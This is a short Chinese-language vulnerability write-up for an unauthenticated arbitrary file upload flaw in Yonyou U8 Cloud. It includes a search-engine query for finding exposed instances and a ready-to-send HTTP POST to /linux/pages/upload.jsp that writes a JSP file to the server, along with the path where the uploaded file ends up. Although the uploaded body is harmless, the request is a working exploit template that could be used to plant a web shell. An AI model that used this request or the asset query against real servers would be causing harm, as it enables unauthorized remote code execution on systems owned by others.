用友U8 Cloud upload任意文件上传漏洞
一、漏洞描述
用友U8 cloud前台任意文件上传导致远程命令执行漏洞。未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
二、影响版本
- 用友U8 Cloud
三、资产测绘
- hunter
app.name="用友 U8 Cloud"
- 登录页面
四、漏洞复现
POST /linux/pages/upload.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: 1ndex.jsp
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 6
Connection: close
123456
上传文件位置
http://xx.xx.xx.xx/linux/1ndex.jsp